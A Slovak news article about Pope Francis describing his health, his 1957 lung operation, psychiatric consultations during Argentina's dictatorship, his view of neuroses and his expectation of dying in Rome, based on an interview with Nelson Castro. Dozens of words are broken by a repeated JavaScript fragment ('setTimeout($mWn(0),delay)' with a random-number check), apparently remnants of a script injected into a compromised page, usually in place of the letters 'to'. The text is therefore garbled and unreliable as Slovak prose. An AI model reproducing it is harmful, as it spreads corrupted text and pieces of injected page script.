Slovo

Pápež František porozprával o svojom zdraví pre argentínsky denník La Nación

3. marca 2021 | Martin Mati

Prečítané: 476x

„Nemám strach zo smrti a predstavujem si ju v Ríme.“ I takdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to hovorí pápež František v rozhovore, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torý poskydom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tol pred dvoma rokmi argentínskemu spisovateľovi Nelsonovi Castrovi pre jeho pripravovanú knihu na tému zdravia pápežov.

Argentínsky novinár, spisovateľ a lekár Nelson Alberdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Castro sa v rámci prípravy svojej knihy rozprával s pápežom Františkom 16. februára 2019. Obsah ich rozhovoru priniesol na svojich stránkach argentínsky denník La Nación 27. februára 2021.

Svätý Otec František v rozhovore potvrdil, že sa vďaka Bohu cíti dobre a plný sily. Podelil sa však o „ťažkej chvíli“ v roku 1957, keď mal 21 rokov a podstúpil odstránenie horného laloku pravých pľúc kvôli trom cystám: „Keď som sa prebral z anestézie, bolesť, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torú som cítil, bola veľmi silná. (…) Nie že by som sa nebál, ale stále som bol presvedčený, že sa uzdravím“.

Pápež zdôraznil, že zotavenie bolo úplné: „Nikdy viac som nepocítil žiadne obmedzenie vo svojich činnostiach“. Ako vysvetlil, aj pri rôznych medzinárodných apošdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolských cestách nemusel nikdy obmedziť alebo zrušiť plánované aktivity: „Nikdy som nezakúsil námahu alebo nevoľnosť v dýchaní (dýchavičnosť). Ako mi lekári vysvetlili, pravé pľúca sa rozšírili a vyplnili celý svoj priesdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor v pravej časti hrudného koša (homolaterálny hemithorax).“

Argentínsky novinár Nelson Castro sa opýtal Svätého Otca, či niekedy podstúpil psychoanalýzu. Pápež odpovedal:

„Poviem Ti, ako sa veci diali. Psychoanalýzu mi nikdy nerobili. Keď som bol provinciálom jezuidom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov počas strašných dní diktatúry, v kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torej som musel prevádzať ilegálne ľudí, aby mohli odísť z krajiny a zachrániť si život, musel som konať v situáciách, s kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torými som sa nevedel vysporiadať. Šiel som za jednou paňou – skvelou ženou –,  kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torá mi predtým pomáhala vyhodnocovať niekdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toré psychologické testy pre novicov. Takdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to som s ňou konzuldom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toval raz týždenne po šesť mesiacov.“

Pápež v rozhovore ďalej vysvetlil, že spomenutá žena, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torá bola psychiatričkou, mu pomohla „zoriendom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovať sa v dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom, ako čeliť strachom z tých dôb. Predstavte si, aké dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to bolo prevážať človeka ukrytého v aute – iba pod jednou prikrývkou – a prejsť troma hliadkami vojenskej kontroly v oblasti Campo de Mayo. Napätie, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toré dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to vo mne vyvolávalo, bolo obrovské.“

Pápež František zdôraznil, že rozhovory so psychiatričkou mu pomohli aj naučiť sa zvládať úzkosť a vyhýbať sa robiť unáhlené rozhodnutia. V tejdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to súvislosti pápež uviedol, že pre kňaza je dôležité štúdium psychológie: „Som presvedčený, že každý kňaz má poznať psychológiu ľudí“.

V rozhovore sa pápež ďalej hovoril o otázke neuróz: „Na neurózy si treba pripraviť maté. Nielen dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, treba sa k nim správať láskavo. Sú spoločníkmi človeka počas celého jeho života“. Pápež v tejdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to súvislosti pripomenul, že čítal knihu, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torá ho veľmi zaujala a správne pobavila, od amerického psychiatra Louisa E. Bischa s názvom „Raduj sa, že si neurotický“ (Rejoice in Being Neurotic): „Je veľmi dôležité byť schopní poznať, kde vŕzgajú kosti. Kde sú a aké sú naše duchovné neduhy. Časom sa naučíme poznať vlastné neurózy“.

Pápež František s argentínskym audom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torom hovorí i o úzkosti chcieť urobiť všetko a hneď. Cituje známe príslovie pripisované Napoleonovi Bonapartemu: „Obliekajte ma pomaly, lebo sa ponáhľam“. Hovorí o nevyhnutnosti vedieť spomaliť a prezrádza, že jedna z jeho metód na dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to je počúvanie Bacha: „Upokojí ma a pomáha mi lepšie analyzovať problémy“.

Na záver rozhovoru sa Nelson Castro pýta pápeža, či myslí na smrť. Svätý Otec odpovedá: „Áno“. Na otázku, či má z nej strach, pápež hovorí: „Nie, vôbec nie“. A na otázku, ako si predstavuje vlastnú smrť, Svätý Otec odpovedá: „Ako pápež, v úrade alebo emeritný. A v Ríme. Nevrátim sa do Argentíny“.